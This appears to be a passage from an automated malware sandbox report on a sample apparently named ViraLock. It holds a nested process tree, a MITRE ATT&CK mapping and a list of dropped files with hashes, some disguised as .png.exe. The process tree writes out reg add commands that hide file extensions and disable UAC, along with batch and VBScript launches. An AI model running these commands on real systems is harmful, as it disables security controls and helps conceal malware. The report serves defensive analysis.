        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        25⤵
        
        PID:1968
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        22⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        22⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        22⤵
        
        PID:1152
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iqwkEkAE.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        22⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        23⤵
        
        PID:1080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        20⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        20⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        20⤵
        UAC bypass
        
        PID:1612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hUUcIgMc.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        20⤵
        
        PID:1464
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:1508
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        
        PID:3332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        18⤵
        UAC bypass
        Modifies registry key
        
        PID:2224
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DmYkQcEA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        18⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        19⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3936
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        
        PID:2496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JyIEowMM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        16⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        14⤵
        Modifies visibility of file extensions in Explorer
        
        PID:232
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        14⤵
        
        PID:4364
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        14⤵
        Modifies registry key
        
        PID:968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DyQEMkUg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        14⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        15⤵
        
        PID:848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1504
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        UAC bypass
        
        PID:4936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qWooUEsg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        12⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
        PID:440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        10⤵
        
        PID:2688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        10⤵
        
        PID:72
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        10⤵
        UAC bypass
        Modifies registry key
        
        PID:2700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\seUcscQQ.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        10⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        11⤵
        
        PID:2768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        8⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3916
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        8⤵
        
        PID:4776
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        8⤵
        Modifies registry key
        
        PID:3912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OaoMEEcg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        8⤵
        
        PID:1324
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        9⤵
        
        PID:4140
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        6⤵
        
        PID:2080
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        6⤵
        
        PID:1008
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        6⤵
        UAC bypass
        
        PID:2412
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WoUUIYUA.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
        6⤵
        
        PID:3332
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        7⤵
        
        PID:4848
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
      4⤵
      PID:1028
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
      4⤵
      PID:944
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
      4⤵
      Modifies registry key
      PID:2524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PUYcAIMw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2896
    - - C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        5⤵
        
        PID:1988
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
  2⤵
  PID:440
- C:\Windows\SysWOW64\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
  2⤵
  PID:3788
- C:\Windows\SysWOW64\reg.exe
  reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
  2⤵
  PID:1172
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DmUgAIos.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:408
- - C:\Windows\SysWOW64\cscript.exe
    cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
    3⤵
    PID:5080

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:772

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:1440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\FaYccgsU\QEgoQUMY.exe

Filesize
184KB

MD5
52f1478d268e538226fde7ee7b9ec4e4

SHA1
2d3a2feaa4f2491089d57bb8f95663d2fdd6a6cc

SHA256
634537dff14672e95fa8017d6303feba7b358fdbd4e474873b35bc2aab46fb55

SHA512
2176115be1c76fce7b706014b048e21b3ef37b8724bbb4831e3519670bb8aeaa1b6fa423b0c42636170f685d2ece2453c8a81821551a68df4504351c505dede8

Download Submit
C:\ProgramData\FaYccgsU\QEgoQUMY.inf

Filesize
4B

MD5
2dd210453b106aea69b1e66ca5de316b

SHA1
6939f1650b12a198cb5fd92cbee07e152f6cc7a0

SHA256
a3e72f94fe8f8a162f7dde489064c74c0a602f4c38a3807dd217dda7664f4296

SHA512
4434849727279189c4b8d39217dac8a47e9b516ad8790a49959bb59eca54432131eccfa55cf44d4b8867745f276aab74cd6e498fd7db211529a0f5bb478b1c00

Download Submit
C:\ProgramData\Microsoft\User Account Pictures\user.png.exe

Filesize
200KB

MD5
f7b44d0533159472d4824c851f2a2b73

SHA1
fd1ceadd9d6ad8cba18dbf1db5a15291cfbf0a7e

SHA256
8ecfc06b62d703b9564a909d0dac71a106b846a2ea76bb8fbf1c60a474cb7917

SHA512
2186772755b1c5c6a99dadcfeb679c06dd571bb6a2e4709e352a985b1d876df5757600abe986bbffc5910d02c90116a262ebf053295764ab77b795a51cd79c24

Download Submit
C:\ProgramData\Package Cache\{63880b41-04fc-4f9b-92c4-4455c255eb8c}\windowsdesktop-runtime-8.0.2-win-x64.exe

Filesize
810KB

MD5
cabd93f078219dfd9f1af04fc78294a6

SHA1
79b4ef31eab2d85b10cf41a30eaddb4d3206d19c

SHA256
1dd728fcd18c3b641ca00563c222d1bded8b87c291657e774571df8f24b87e2b

SHA512
09039db9293824cde0920776c231d5d95b0cea83e64ae1092c1c665a58b070739ef9fee71b69a0c4d0451900071165da2206319d12e48940d8d11fdb88608721

Download Submit
C:\Users\Admin\AQwAIkAA\IuoMEsUc.exe

Filesize
191KB

MD5
08758ced2a59b176120b8956a44d9631

SHA1
7810c2a18b1896082eeaa4410d52b432c5626b4d

SHA256
6b81a000690401c5191f1e22eaab6921f355838264dcb25db77dcb81ce8289a2

SHA512
68fb2c30cd65ecc4f4428e0625fc63034566dfd49529dc6564633eb3e07ae5d33ecf679d2e0576784e6bdb9ec9426ea02c85aaf1f1177487d411b7ad3e1a067c

Download Submit
C:\Users\Admin\AQwAIkAA\IuoMEsUc.inf

Filesize
4B

MD5
f623fad6d75f05dbcd003782ed4ba7f8

SHA1
2949492f6292f94d4cc6cbbf64b87e68f5639f11

SHA256
dabb85beea99f249299e7e0edd4039f4fb6d441bb860d99afca50adfbe654d26

SHA512
6a7c2fadfa3f86c7aefb9ddc1408398361aa00398e48a56f44caf268ef2aa41c75cd060a40adad52d9444be0d1427cd0044ec75e2fe3185a9e54f3fdb144765a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\256.png.exe

Filesize
207KB

MD5
49f3c917b88c1202f0ad7e7625f72114

SHA1
4983aedba9a34a5b85fe30d5bdf53babcba4d5af

SHA256
936504541639fac6e5accda1eb5f0b355205a89ec8400047be7d1b4e89977ffa

SHA512
864ab86c7599031e5e99377e06c68836294b7144da2b42ed28bf34904bf5c2147ddfc5a4e36305fcb5bd58ec2d05fec6b11333f03769c580c4850b5e52cded90

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png.exe

Filesize
190KB

MD5
784191c389d527bc9ce8a750a01d7ace

SHA1
85e6e5c6d9e198fe987ffc35d2ebe453bd2c897b

SHA256
4d4c2902b2c16d067d70775429846babcce6711d9208cd816fb6be8b6e322187

SHA512
973b5b714508132ceadbbbfac6005a884d9688bd92d12848dc56853223b4dde9605fe3fe51ea78ff2d387e66147b150bdcc7eaefab721d83676cef8c2c98ebd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png.exe

Filesize
201KB

MD5
78fc72835b748c3d0cf7f99d4d1d2968

SHA1
787162a43618e2e2ad0591c496dae982eff072cd

SHA256
ea35384a7ef57b7a89fb9269df297983a661ea6952d1a7745f22876101fbf2b2

SHA512
8651ea84e26bc76d44498b050794d7568f21d63518877f46a6d80c5779def29927b94a306dd1298872e197d7651288b38d059c195c8e74d523de317a7120081d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
28KB

MD5
6995adbc31a9b13725817949e3244d7b

SHA1
6083847a2e60d5c1d4147f0550217ff4fe5651cb

SHA256
11fa66511fc7db5354eb4ba88ee236b5e7edd8215166e694359c1c69e26f5338

SHA512
76d11d72eed5504a56e3de9ce54ca2c3636ea3d68ad08c7332c119e7c6e15b1b2ff773c8a590729c68a7505e55843cf498a3ee804751ed5313ff5db50ebdf53e

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\38975140460\squaretile.png.exe

Filesize
204KB

MD5
460a92cc658379ef5467569bc96b07ec

SHA1
657d287534eeb9bf07fc393b24437c90595119a9

SHA256
f134d5f6b31722fbb7e48d53c6c83c0b64c12414ce6400901359d6311f7b723c

SHA512
0eba9cb14104168b6a19eeec60448e4dedbae47a95a5b878e0d4f107c8806865547d35d4487830fe45e4edd560eee6e0f74e15d5f2fc78882884fe85c3e95916

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\6501008900\squaretile.png.exe

Filesize
204KB

MD5
dd032ee9e86c261762531c70b9ba426c

SHA1
9305253ddcec98fe9ec5d7939b9d1ad706ef3b39

SHA256
7bc7f2dfd40b6dc93ba5ca9c579153ecac647beb0bce67d84ef4e626263cd073

SHA512
de2d096560c8e4f9ac00901c03e13bb2c83d222f44a1747ff188f6c5c31893637429a4e99f3a51b5bfe9d67557b90fce0b5cde183f5984c5e8e6d5dc4be7dc7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\AAwu.exe

Filesize
200KB

MD5
a07140d74a731a7dde92fa0b9ffa6b23

SHA1
24bf85b1f1be395e80233cbe8e91e911d73531c2

SHA256
47f8dacbe7dcd098aea1f2dbdc5bb94527013b622158cea4b58a7b81874a9475

SHA512
c42b56cd4fe0d0d9c2f51968d3960307917cf9c4aae6692fc8881f8fb5865710e2dd7554fe19304773ad8cf28105f13132e1d99bcf5d2bdf1f19f653a8d5286b

Download Submit
C:\Users\Admin\AppData\Local\Temp\AEQi.exe

Filesize
203KB

MD5
377d184e28da2b19e3aacf599dadebe7

SHA1
f04925da7f008e6a22f75a387c41192f04481d3a

SHA256
fb480d4f9a265ebd3d43a8f2343fe361e20d728a982603bda515b7c291a8781b

SHA512
ef800ef8860fe1d7716fc6602641fa928a98f32681f3dbaafc7b797a02b969a29f430ffa4ff93cb6b437b9aa99b9b6df76966a0dae79ffda1a0f9b72e4f7d2e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\AMIG.exe

Filesize
211KB

MD5
c51416685146cb3c9bf39b2bbf0401da

SHA1
efd1867fbe0186e78f4c1e7e0935fb94a03024f7

SHA256
65f6fe7cc14743cf0ab2e5642ec49ff9e1a29dc2f9075eb7085d535ff9861167

SHA512
cd2284e307f1daa1c37af454b3cf271613a3ac6a5871a71f7ddce02cd9b08605715e49051a2c2bf53cdaafdea220282e54644840b415144ccb31d1d996a134fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\AQUo.exe

Filesize
542KB

MD5
5f16b6b7b7ebbf1e0c46f4837b29c001

SHA1
7fcb6000dde3b81c9b1c29549d5446d143e713f4

SHA256
4607087cd63d443489ba061c05777ced6d33b0a7296d2c2f43c158c7dcda9137

SHA512
5f3b2e38ec2b30380df12b2fca708d4001f17cc2f9281e59a11a89ebce7b7f2da3383ba7c4396f8d9de2efc0e7fc0f60821fe8cfd9040f540212a902bcb05bef

Download Submit
C:\Users\Admin\AppData\Local\Temp\AUow.exe

Filesize
210KB

MD5
0bbca323e587b649cadd67a44b8b2a75

SHA1
535ab86c56181dd1adf279498d3d3d64bef7579c

SHA256
40249666427cc373e0108fc0b03e2928e15b63fe7781b46cf0da67088bdc0c5f

SHA512
67f01306373298f87e730623bf4850714890057b39c182a5b917d36fb2498c7a2ba319c9ab2406189fc1a3b186bab6c59c2a26d4c27337c046d07c4468111c9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\CMck.exe

Filesize
206KB

MD5
a1713f43dfa5dceec89d33e177638929

SHA1
62bf5943ee69c242fa66a2a0c78c8d912473021c

SHA256
103cb92583af434c99b4e879c72ca96ab7742024296152244ffb375a31e35e21

SHA512
701cba62352875771b38820d18cbe01c02b78ea761f461a061453a829c1e1e58d61d18b73adbaf691fbf5701f3c05aafbb3941423e1a6aa1f5b21eab491bce84

Download Submit
C:\Users\Admin\AppData\Local\Temp\CQsg.exe

Filesize
634KB

MD5
bb9d70019238beaa604385aa7db307dd

SHA1
3e1f1532c7c534f0ab7d63a8e33f9859c21375dd

SHA256
4e19c9d3f134beb7ce4791696c717452060cbdc8e1bac488e7da50c13043a62e

SHA512
f01149bc24b3fc371975b52e874fa635954b19639f2df9e6d06a57426e58f8df91c1840249908411369734542180b72cf720c79ff3957fe877d4b2077044ed89

Download Submit
C:\Users\Admin\AppData\Local\Temp\DmUgAIos.bat

Filesize
112B

MD5
bae1095f340720d965898063fede1273

SHA1
455d8a81818a7e82b1490c949b32fa7ff98d5210

SHA256
ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a

SHA512
4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

Download Submit
C:\Users\Admin\AppData\Local\Temp\EIMO.exe

Filesize
209KB

MD5
a7f52c4f15c9b9989b9f94164795d7a7

SHA1
3ed06c8c3bf8d217daf2220beb4158a238ddd5c4

SHA256
dec4ff4b8693d67b75e378ecc35174f1677c04d6979a141891061ff0576ef8ed

SHA512
34af8c0e31f24db0111f3da4101d4b27688a80e33e3bf361dbdc1c07395d1e7ed5f60c9391f4b2aea02243b080979c0a93cf9d29f8f17568fa94b77286c17e5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\EUsc.exe

Filesize
196KB

MD5
caa6ef3892d7d35a11a43ae95a854051

SHA1
37075f1f2b1cfd7ecc792ddbcbb0dbaa3b8d9f6b

SHA256
ee23d52a0e9f00c6b87c5c1bd484085c5d44480f4389743a48ca7851c32d2d35

SHA512
d6f7a0600de6d1acb35168a39b58a855909560a5801292d90e4a06931a997dbec450436751ee441b2be8989b23254f8b75dc18321c92c0732510197c2e8defdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\EcQw.exe

Filesize
202KB

MD5
37d106b85f1d52128812de1be7153997

SHA1
aec60373fc08147078d89c89983c12341edb4adc

SHA256
6c0e01722cd3c15d89fa9a9a7edd1a57c8d39b70c47678efd67d2d5d6c76ef90

SHA512
ef7fe42d728aa9c119c5c7d2e42a327ae816c51aedc26dfba07aed6ab3e2d8efc75cbd3ad824a714b07bf6775c8285cba7cfe4d8aedc6ea11c5cf48ac21ee776

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ecow.exe

Filesize
1.1MB

MD5
51e0987f00c13fb721ef45357bfce955

SHA1
5adae324928f83e889a054711ffea1fd647a0bc3

SHA256
2e63d715fe35a4967d355559732911b8e43980507a7e1e3274a2a8adf90d7006

SHA512
08dff3612be449e325d87ff7a308745e57fba94f75f9f8c6e820ed6d02df4dfca8d30b87a4d3672e715e3e42d4488e9e9ae99ea982184b316248de33257cfd9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

Filesize
6KB

MD5
76e08b93985d60b82ddb4a313733345c

SHA1
273effbac9e1dc901a3f0ee43122d2bdb383adbf

SHA256
4dc0a8afbf4dbb1a67b9292bb028b7f744f3029b0083c36307b1f84a00692a89

SHA512
4226266b623d502f9b0901355ff388e1fc705e9baff0cbe49a52ef59578e1cc66f5026c030df4c8a8f5000b743523ccf18c533aee269b562d3017d14af014f9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\GIsM.exe

Filesize
214KB

MD5
5d94beea9856758fc26e5e4676e57ee2

SHA1
509434827ccf5bf4670edda2b12e4ceca6ff5d36

SHA256
b222dd489bcd1e19bddc382c474ed90b925e50f943a6182285e5174bfce615bd

SHA512
458d5a88d6965a175870c69f36fdf9f32eeb107d2e38293bab8c4e41400fb0fd24930b5ed6de4e35865789890f64c8ddcec1831c45dfe1f1394b5d1da471861f

Download Submit
C:\Users\Admin\AppData\Local\Temp\GMQW.exe

Filesize
181KB

MD5
c08f8d92ee17512403a1fcaba78b41eb

SHA1
ddda800024fe18bb7b4efe3c6e0a72720da95abd

SHA256
feea74a2a18467ecfcca9975aa3efc0e56a1f9e6c14306ce5bf03cc3e3da9b3c

SHA512
0a87f01e001827880a1a805487bd66863bc33f105094d67c89abe1ee51d4696189fc7ff7ad417f25d264e488e2e4bfb3ab0c30fe40138919d658a6d1a39e764a

Download Submit
C:\Users\Admin\AppData\Local\Temp\GgAw.exe

Filesize
204KB

MD5
14b63c173f69738e889114c1cae46666

SHA1
b78e4cf955f6282ce53491e61a5764cade6c2fca

SHA256
af1dfbd79034c09cb73726d0e78bebbda483883fc30e9758f48ce10110e37c1b

SHA512
bc8ef4e6758909cc6ff3b4c3408c3ec82e0e18bc5e1533953a583798997d01735f4f40d8a2f542beb283fff3d997b224f781f37101d36187c87d3745dc096624

Download Submit
C:\Users\Admin\AppData\Local\Temp\GoAu.exe

Filesize
191KB

MD5
627fb011396913eca87d2ea920cfb7f1

SHA1
c8910e35ce94baf081ff8fbcb83b62f2cf5d5fc9

SHA256
cb8911e2e7dcda3a100552ccb0ccd16d37109ab150b205c79fa1685903897327

SHA512
1a888b6577cec1f42517c571418ab4170d34a1f6ff43936aa9c4660fa132525cd434fed92934876e9dc2f399605f03204d9f426d6377e302d9e8bd89404aa848

Download Submit
C:\Users\Admin\AppData\Local\Temp\IMkM.exe

Filesize
191KB

MD5
10bc1f09d8ba9e381c69b9abe4d69738

SHA1
d8668034095983b6eeccec34b863648f012dc4dc

SHA256
4556b6644f6f43749820a492493663b6effe518f07ac2bc57813f9461c5d107b

SHA512
9f50eb0dbb8876e857336ad1ee168db8c689eaff47c1ac30b4e4e9667166b01dde4a129927a4074c159404bd79f7057c9945d11e0146d960cd463ed96b1e86b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\IQsU.exe

Filesize
192KB

MD5
fa9cf00c61033e1088ba4a35d1828eee

SHA1
5082e1c3b4c7eb16f9f97c5997a17fdecccd4cae

SHA256
588e63620df32d0ff86ce01cb9ff0acdeb190f75484873c833e6b662297fbd96

SHA512
7f23f9ff0023b1d906d617b8fb8445eedd81690e3757f6830b48341088aa77fdde41db9871239c4a59c41c8eee9cc1a3e11deaff10c5a21d3b85df4e92c7e1b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\IUoM.exe

Filesize
248KB

MD5
48082f64eaaef94543d93c091ae4c032

SHA1
782fde989472976114352715e53051eff7a3913d

SHA256
b1f302a60c53327d34717da2e66b0613fe933cdf1a8f96f6071c96b6cfd8071e

SHA512
ca2fdc49f628f832dc68076356ebd994b4542d700ccc722fba104e70fc12884c4ea2553f0625c2633d95a68233cc6a379274280b7bb3f9ce4c5e64b1ced70439

Download Submit
C:\Users\Admin\AppData\Local\Temp\IYEw.exe

Filesize
317KB

MD5
53256c37cb380939e2db34d8f826e732

SHA1
0c23b316819dea25e9d6647c389c3e48a42836ea

SHA256
fb00f49910c8c9e0ccf66acb6e4dd713d512c854dfb6e4cb8e85915db2f6f6d2

SHA512
a4a03b0fe517903c1ba68c377d934ff7b83b3cfd8287b9f4ba4e8c8d42ba4f08ebbff0002dfff2013038bb7379220f6b97c63539e99ea4556938e8a6c0a8cdf9

Download Submit
C:\Users\Admin\AppData\Local\Temp\IYco.exe

Filesize
188KB

MD5
5bb5b53c82ba46a5af35ac6660d7752c

SHA1
5aed8fa2bf2974c2da21a2cb3431259fa25f31ad

SHA256
479d9b3b885b1a98cabfc1c68fb880dcaa08993c2374b40c4e4302a1a31396aa

SHA512
2341e1b3587df5473ea69326e524d806e208b97c95dca0db437af510f509f838fe7a096a645589928adbb4136784ac526b9a45df6bf642e7f8eae0bde05bb8b4

Download Submit
C:\Users\Admin\AppData\Local\Temp\IgoU.exe

Filesize
566KB

MD5
8513f5db496fe57e4a60a7a84724b7d4

SHA1
74bd1fd0f2baaa41952a2bfa2aa2c7c79c2e3392

SHA256
be54f0bec13529794b6af695de298ec474403e6edb04bd49d579372f5c9af592

SHA512
c93c4b6ba43a29c5b939c29c4a4b939aab3885e4c1646921da74389ee07002b088cabb8eacd9254a902d6fdf4c6d2d92adff204c9654812a7d8ed9048db4b522

Download Submit
